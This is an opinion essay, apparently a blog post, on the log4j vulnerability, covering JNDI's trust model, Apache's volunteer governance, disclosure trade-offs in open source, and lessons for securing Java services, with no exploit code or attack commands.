Lessons learned from the log4j debacle

By the time you read this, you’ll already know a few things about the whole log4j vulnerability, but you may not have have realized how fragile cybersecurity for real-life services really is. I think it’s time we have a look.

Background

Before we look at what this vulnerability means, and to avoid you having to dig around the Internet to find out, let’s have a quick look at what the vulnerability actually is.

Timeline

The vulnerability was introduced back in August 2013 (as far as I can tell from the Git history) when a feature was introduced to use Java’s JNDI to substitute certain values in log messages. Note that date, we’ll get back to it later.

JNDI is a standard feature in Java that was introduced in 1997 and allows the Java Virtual Machine (JVM) to download and run code, patching it in from a third party. This allows for amazing flexibility: you can write an application that simply calls into a shared interface, but downloads the implementation of that interface from somewhere else. You don’t have to worry about how you get the chunk of information you need, because someone else is already doing that for you. Cool, right? Well, 1997 is before REST was invented. At the time, downloading and running foreign code was not frowned upon, and cybersecurity was less of a concern in the minds of the people writing code. Today, and actually shortly after 1997, this would not be a considered a good idea. I’ll admit it’s convenient though.

Convenience over security

The real issue is that JNDI assumes a trust model that doesn’t hold up: generally, you would not want any code, whether you’ve written it yourself or not, to have access to any resources it does not need access to. If you need to run some other chunk of code that is hosted elsewhere, you shouldn’t download that code and run it locally precisely because that other chunk of code will then have access to everything you have access to, and you will need access to whatever it needs access to to allow it to run.

Let me clarify this: if I ask you to make me a cup of coffee, and I’ll give you money for that coffee, I need access to my money and you need access to your coffee machine and supplies. If I download the “make coffee” code via mind meld, and then execute it, I still have access to my money, but now so does the “make coffee” function I downloaded from your brain, and I also need access to your coffee machine and supplies. If your “make cofee” function takes an extra twenty dollar bill as part of making coffee, I’ll still get my coffee, but I’m out an extra twenty! If my code running your “make coffee” routine takes some extra supplies, you have no way to stop me either! I’m not saying this is why mind melds are a bad idea, but it is why JNDI is a bad idea: it assumes a trust model that is not secure by default.

So, JNDI is a basic feature of Java and assumes a trust model that is not secure by default. That sounds like a basic flaw in Java rather than a vulnerability in log4j, and it’s been there since 1997. Surely Sun or Oracle has created a fix for this since then? Well, yes, you can turn it off, but it’s not that easy: configuration in Java is basically broken and definitely overly complicated. You can configure your JVM to allow or disallow certain things, but the default configuration is not secure and any non-trivial application has hundreds of settings to comb through. Finding and understanding the documentation of all of them before deploying on a deadline is a recipe for failure. Again, secure by default was not a thing in 1997 and the whole strength of Java is to never break backward compatibility, so if you want to secure a Java application you’re going to have to do it yourself.

Still not a log4j issue though.

So, Java has had this feature for 16 years and its use is introduced as a feature in log4j in 2013. There would have been a secure way to do this: just don’t allow user input to trigger JNDI queries. If you want to use JNDI for anything, get it from the configuration and get the logging framework itself to do it, but don’t rely on user input. That was the intent, but that is not what was implemented.

You can get really cool features by allowing user input into a a query. For example, if I want to log logins, logouts, and login failures, I’d want to know who logged in, right? So I’d want to take the username entered by the user, and log it, right? Sure! But I’d also want to know that, for example, the username “HumongousPotato” actually corresponds to a user called “John Doe”, so I’d want to look up the username in my LDAP server, get their common name from that LDAP server, and use that. Easy peasy, just have the logging apparatus do it, right?

That was basically the intent: convenience. Java is all about convenience with its thousands of libraries and APIs that seem to never break as new features get added. It’s all about productivity, reducing time to market, getting stuff “out there”.

This whole issue was born from a “convenience over security” mindset. Nothing malicious about it. Nothing overly lazy either: productivity and convenience are Good Things. The “compile once run anywhere” mantra is a mantra of convenience and it works! Java code is routinely well-tested and good quality code that just works out of the box, all the time, but the price for that convenience is security.

Now, I’m not just saying this for the heck of it: the Struts vulnerability that caused the Equifax breach back in 2017 is in the same category of convenience over security, allowing code execution from a well-chosen malicious HTTP header.

Apache

In the world of Java components, you’ll often see a name pop up: “Apache”. When you say “Apache” to a Linux admin, especially when they’ve been around for a while, they’ll think about the Apache HTTP web server which, before nginx came around, was the de-facto web server for Linux. It’s the ‘A’ in “LAMP”, after all. If you don’t know what that means, it’s fine.

But for Java developers, the name “Apache” is attached to a number of frameworks and libraries that are just very useful, ranging from the Xerces XML parser, which was already the de facto standard XML parser in both Java and C++ two decades ago, and is actually still going strong, through Apache Struts, a framework for Java web applications, and Apache log4j, a logging library.

Apache proudly announces itself as “the world’s largest open source foundation”, and they’re right: they’re much larger than the Free Software Foundation and have a well-defined open development process based on the ideals of meritocracy. They provide the logistic backbone of a large part of the open source community and lend their name to dozens of projects.

What they are not, is a business. People who work on projects that carry the Apache name are unpaid volunteers, not employees. They don’t have a group of employees with a strong background in cybersecurity to provide guidelines and training to developers, and they don’t have an infrastructure to allow project teams to automate cybersecurity checks and workflows into their CI/CD pipelines. When you see, in a news article somewhere, that “Apache has released a fix for the log4j vulnerability” or that “The Apache team is working on a fix”, whoever wrote that is thinking of Apache as a business, which it is not.

Let me be clear: Apache did nothing wrong here. They enable good-quality open source projects by providing structure and some logistics, but the Apache Software Foundation is not responsible for the contents of those projects: the project’s Project Management Committee is.

Responsible disclosure

Apache has a security team and a vulnerability management policy that is in line with its philosophy of transparency and good governance: when you think you’ve found a problem, you send a message to security (at) project (dot) apache (dot) org and follow the process descibed.

As far as I can tell, this process was followed, a fix was made available to the community, and the CVE was then published. The problem was that this last step was done too quickly.

Transparency and openness are fine: they are what open source is all about. However, when you have a popular logging framework, and logging is something that everyone is encouraged to do all the time (among other things for cybersecurity purposes), then just publishing a fix and publishing the CVE a day later is not a good plan.

Again, Apache is not a business. If it were, it would have been expected to have a list of its users and to privately notify them of the importance of upgrading to a version with the fix, before releasing the details about the fix to the public. This is tricky: if everything is done out in the open, and you notify of a new version that fixes a vulnerability without telling everyone what the vulnerability is, a malicious actor can still go look at the code and figure it out. The commit messages and the code changes will make it clear what the issue is. On the other hand, keeping things under wraps is not a good idea either, and there is no time between the binary version of the library being released and the source code being released, like you’d have with a closed-source project.

In short, responsible disclosure becomes extremely difficult when you’re dealing with a popular open source project that neither can (nor arguably should) track its users and communicate with them privately, nor keep problems under wraps for the time needed to allow its users to upgrade to a version with a fix.

Again, frustrating as it may be, Apache, the project, and its volunteers did nothing wrong: they were in a situation that could not be worse, and they handled it as well as they could.

“But what about Alibaba? They were under fire for their way of disclosing the vulnerability, right?” Well, yes, but by the Chinese government. The Chinese government wanted Alibaba to disclose the vulnerability to them first, before disclosing it to the project team. The only legitimate reason I can see why they’d want that would be to protect their own assets that use log4j, but let’s not be naive: China is in a cyber-war with western nations and would probably have exploited the issue if they had known about it.

Fall-out

Between December 10 and December 13, when the CVE was published and people started becoming aware of it, thousands of websites and web-based services were “preventatively” shut down as IT teams worked through the weekend to find out which versions of log4j they had deployed, and how to patch the vulnerability in their code.

This turned out to be an iterative process as most applications don’t use the latest versions of third-party libraries, and log4j is not necessarily a direct dependency of the applications that use it (i.e. they may use a component that (uses a component that …) uses log4j).

Add to that that the initial fix was not a complete fix of the issue, that just reading about the issue in the CVE listing isn’t all that informative and thet deploying an updated web application to production usually requires at least some testing, those IT teams had a lot on their hands.

The FBI has set up a service to report exploits for the vulnerability, but as far as I can tell the RCMP has not.

In the mean time, several exploits were published on Twitter, GitHub, and various other places. Anyone with a web browser (that is: anyone at all) could set up an exploit for this vulnerability in minutes and exploit it on any vulnerable server.

That is not the problem, though.

The problem is that someone who exploits the vulnerability and is smart about it won’t stop there: they’ll use that ability to run arbitrary code on a target server to install a worm on that server, create a back door, and “go dark”. If they do that on a wide array of targets, some of those worms will survive and be usable as back doors later.

Lessons learned

Security before convenience: Java is a nice programming language, but the philosophy behind the language and its support, never breaking anything with updates, is broken. This will happen again and again, until the JVM is shipped with a configuration that shuts anything that could possibly be exploited down by default. “Anything that could possibly be exploited” includes the majority of Java language features, so it’s probably better to give up on Java for public-facing interfaces (UI and API).

Responsible disclosure is incompatible with completely open development: when you’re doing everything in public, it’s hard to keep a secret. That does not mean open source software should stop being open source, but it does mean that there should be a reasonable (say three-to-six-month) window for security-related code to become public. That won’t work all the time, and it’s not a complete nor universal solution, but it’s something to think about.

Eight years is a long time: what are the chances of no-one having found and exploited this bug in eight years? Would we know about it if anyone had? Do all governments and large corporations have active intrusion detection mechanisms that detect outgoing connections to unknown servers (which would have caught an exploit in this case)? Is the threat model clear?

Use VMs to mitigate: once an exploit has been released to the wild, you don’t know if the server you’ve been running your application on is still OK. Scrap it. Replace it with a VM that you can scrap more easily. Make sure it’s in a sandbox that’s hard to get out of. Security over convenience.